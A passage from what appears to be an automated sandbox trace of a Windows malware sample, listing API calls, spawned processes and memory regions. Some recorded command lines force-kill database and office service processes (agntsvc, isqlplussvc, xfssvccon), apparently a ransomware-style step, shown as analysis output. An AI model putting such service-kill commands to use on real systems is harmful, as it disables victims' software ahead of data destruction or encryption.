(_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0166.164] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0166.165] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0166.165] GetProcessHeap () returned 0x7e0000 [0166.165] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7e7438) returned 1 [0166.165] GetProcessHeap () returned 0x7e0000 [0166.165] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa) returned 0x7eb130 [0166.166] lstrcmpW (lpString1="\\taskkill.exe", lpString2="\\XCOPY.EXE") returned -1 [0166.170] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\taskkill.exe", lpCommandLine="taskkill /f /im agntsvc.exeisqlplussvc.exe ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="taskkill /f /im agntsvc.exeisqlplussvc.exe ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="taskkill /f /im agntsvc.exeisqlplussvc.exe ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0x560, dwThreadId=0x55c)) returned 1 [0166.213] CloseHandle (hObject=0x98) returned 1 [0166.213] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0166.213] GetProcessHeap () returned 0x7e0000 [0166.214] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7e9d80) returned 1 [0166.214] GetEnvironmentStringsW () returned 0x7e9d80* [0166.214] GetProcessHeap () returned 0x7e0000 [0166.214] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa76) returned 0x7e7cf0 [0166.214] FreeEnvironmentStringsA (penv="=") returned 1 [0166.214] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0167.676] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x80) returned 1 [0167.676] CloseHandle (hObject=0x9c) returned 1 [0167.677] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000080") returned 8 [0167.677] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000080") returned 1 [0167.678] GetProcessHeap () returned 0x7e0000 [0167.678] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7e7cf0) returned 1 [0167.679] GetEnvironmentStringsW () returned 0x7eb180* [0167.679] GetProcessHeap () returned 0x7e0000 [0167.679] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa9c) returned 0x7e7cf0 [0167.679] FreeEnvironmentStringsA (penv="=") returned 1 [0167.679] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0167.679] GetProcessHeap () returned 0x7e0000 [0167.679] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7e7cf0) returned 1 [0167.680] GetEnvironmentStringsW () returned 0x7eb180* [0167.680] GetProcessHeap () returned 0x7e0000 [0167.680] RtlAllocateHeap (HeapHandle=0x7e0000, Flags=0x8, Size=0xa9c) returned 0x7e7cf0 [0167.680] FreeEnvironmentStringsA (penv="=") returned 1 [0167.680] GetProcessHeap () returned 0x7e0000 [0167.680] RtlFreeHeap (HeapHandle=0x7e0000, Flags=0x0, BaseAddress=0x7eb130) returned 1 [0167.680] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0167.680] _get_osfhandle (_FileHandle=1) returned 0x13c [0167.680] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0167.680] _get_osfhandle (_FileHandle=1) returned 0x13c [0167.680] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0167.680] _get_osfhandle (_FileHandle=0) returned 0x130 [0167.680] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0167.681] GetConsoleOutputCP () returned 0x1b5 [0167.683] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0167.683] SetThreadUILanguage (LangId=0x0) returned 0x409 [0167.684] exit (_Code=128) Thread: id = 192 os_tid = 0x1120 Process: id = "29" image_name = "taskkill.exe" filename = "c:\\windows\\syswow64\\taskkill.exe" page_root = "0x31fe8000" os_pid = "0x560" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "28" os_parent_pid = "0x1128" cmd_line = "taskkill /f /im agntsvc.exeisqlplussvc.exe " cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2416 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2417 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2418 start_va = 0x40000 end_va = 0x43fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2419 start_va = 0x50000 end_va = 0x65fff monitored = 0 entry_point = 0x5de80 region_type = mapped_file name = "taskkill.exe" filename = "\\Windows\\SysWOW64\\taskkill.exe" (normalized: "c:\\windows\\syswow64\\taskkill.exe") Region: id = 2420 start_va = 0x70000 end_va = 0x406ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000070000" filename = "" Region: id = 2421 start_va = 0x4070000 end_va = 0x4084fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004070000" filename = "" Region: id = 2422 start_va = 0x4090000 end_va = 0x40cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004090000" filename = "" Region: id = 2423 start_va = 0x40d0000 end_va = 0x410ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000040d0000" filename = "" Region: id = 2424 start_va = 0x4110000 end_va = 0x4110fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004110000" filename = "" Region: id = 2425 start_va = 0x4120000 end_va = 0x4121fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 2426 start_va = 0x4200000 end_va = 0x43fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004200000" filename = "" Region: id = 2427 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2428 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2429 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2430 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2431 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 2432 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2433 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 2434 start_va = 0x4580000 end_va = 0x458ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004580000" filename = "" Region: id = 2435 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2436 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2437 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2438 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2439 start_va = 0x4590000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004590000" filename = "" Region: id = 2440 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2441 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2442 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2443 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 2444 start_va = 0x4130000 end_va = 0x41edfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2445 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2446 start_va = 0x74650000 end_va = 0x746cafff monitored = 0 entry_point = 0x7466e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 2447 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2448 start_va = 0x4400000 end_va = 0x443ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 2449 start_va = 0x4440000 end_va = 0x447ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004440000" filename = "" Region: id = 2450 start_va = 0x76ae0000 end_va = 0x76b23fff monitored = 0 entry_point = 0x76af9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2451 start_va = 0x75260000 end_va = 0x7530cfff monitored = 0 entry_point = 0x75274f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2452 start_va = 0x74450000 end_va = 0x7446dfff monitored = 0 entry_point = 0x7445b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2453 start_va = 0x74440000 end_va = 0x74449fff monitored = 0 entry_point = 0x74442a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2454 start_va = 0x74590000 end_va = 0x745e7fff monitored = 0 entry_point = 0x745d25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 2455 start_va = 0x77450000 end_va = 0x77596fff monitored = 0 entry_point = 0x77461cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2456 start_va = 0x76b30000 end_va = 0x76c7efff monitored = 0 entry_point = 0x76be6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 2457 start_va = 0x753c0000 end_va = 0x75451fff monitored = 0 entry_point = 0x753f8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 2458 start_va = 0x77290000 end_va = 0x7744cfff monitored = 0 entry_point = 0x77372a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 2459 start_va = 0x75310000 end_va = 0x7536efff monitored = 0 entry_point = 0x75314af0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll") Region: id = 2460 start_va = 0x77240000 end_va = 0x77284fff monitored = 0 entry_point = 0x7725de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 2461 start_va = 0x6cda0000 end_va = 0x6cda7fff monitored = 0 entry_point = 0x6cda17b0 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 2462 start_va = 0x6cd80000 end_va = 0x6cd95fff monitored = 0 entry_point = 0x6cd821d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 2463 start_va = 0x6ccb0000 end_va = 0x6cceefff monitored = 0 entry_point = 0x6ccc46c0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\SysWOW64\\framedynos.dll" (normalized: "c:\\windows\\syswow64\\framedynos.dll") Region: id = 2464 start_va = 0x6c9a0000 end_va = 0x6cadefff monitored = 0 entry_point = 0x6c9cd880 region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\SysWOW64\\dbghelp.dll" (normalized: "c:\\windows\\syswow64\\dbghelp.dll") Region: id = 2465 start_va = 0x6cd60000 end_va = 0x6cd7bfff monitored = 0 entry_point = 0x6cd64720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 2466 start_va = 0x6cd50000 end_va = 0x6cd59fff monitored = 0 entry_point = 0x6cd528d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 2467 start_va = 0x4480000 end_va = 0x449ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004480000" filename = "" Region: id = 2468 start_va = 0x44a0000 end_va = 0x44c9fff monitored = 0 entry_point = 0x44a5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2469 start_va = 0x4800000 end_va = 0x4987fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004800000" filename = "" Region: id = 2470 start_va = 0x74ea0000 end_va = 0x74ecafff monitored = 0 entry_point = 0x74ea5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 2471 start_va = 0x4990000 end_va = 0x4b10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004990000" filename = "" Region: id = 2472 start_va = 0x4b20000 end_va = 0x5f1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b20000" filename = "" Region: id = 2473 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2474 start_va = 0x41f0000 end_va = 0x41f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000041f0000" filename = "" Region: id = 2475 start_va = 0x4480000 end_va = 0x4484fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "taskkill.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\taskkill.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\taskkill.exe.mui") Region: id = 2476 start_va = 0x4490000 end_va = 0x449ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004490000" filename = "" Region: id = 2477 start_va = 0x44a0000 end_va = 0x44a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044a0000" filename = "" Region: id = 2478 start_va = 0x44b0000 end_va = 0x44b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044b0000" filename = "" Region: id = 2479 start_va = 0x5f20000 end_va = 0x6256fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2480 start_va = 0x4590000 end_va = 0x4679fff monitored = 0 entry_point = 0x45cd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 2481 start_va = 0x4700000 end_va = 0x47fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004700000" filename = "" Region: id = 2482 start_va = 0x44c0000 end_va = 0x44c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044c0000" filename = "" Region: id = 2483 start_va = 0x4590000 end_va = 0x466ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2484 start_va = 0x76e20000 end_va = 0x76e2bfff monitored = 0 entry_point = 0x76e23930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 2485 start_va = 0x44d0000 end_va = 0x44d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044d0000" filename = "" Region: id = 2486 start_va = 0x76c80000 end_va = 0x76d03fff monitored = 0 entry_point = 0x76ca6220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 2487 start_va = 0x44e0000 end_va = 0x44e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000044e0000" filename = "" Region: id = 2488 start_va = 0x6cca0000 end_va = 0x6ccacfff monitored = 0 entry_point = 0x6cca3520 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemprox.dll") Region: id = 2489 start_va = 0x6cc30000 end_va = 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 2490 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 2491 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 2492 start_va = 0x44f0000 end_va = 0x452ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044f0000" filename = "" Region: id = 2493 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 2494 start_va = 0x4670000 end_va = 0x46affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004670000" filename = "" Region: id = 2495 start_va = 0x46b0000 end_va = 0x46effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046b0000" filename = "" Region: id = 2496 start_va = 0x6260000 end_va = 0x629ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006260000" filename = "" Region: id = 2497 start_va = 0x62a0000 end_va = 0x62dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062a0000" filename = "" Region: id = 2498 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 2499 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 2500 start_va = 0x4570000 end_va = 0x4575fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004570000" filename = "" Thread: id = 193 os_tid = 0x55c Thread: id = 194 os_tid = 0x514 Thread: id = 195 os_tid = 0x500 Thread: id = 196 os_tid = 0x1194 Thread: id = 197 os_tid = 0x1150 Process: id = "30" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x31b74000" os_pid = "0x510" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im xfssvccon.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2501 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2502 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2503 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2504 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 2505 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 2506 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 2507 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2508 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2509 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2510 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 2511 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 2512 start_va = 0x77720000 end_va = 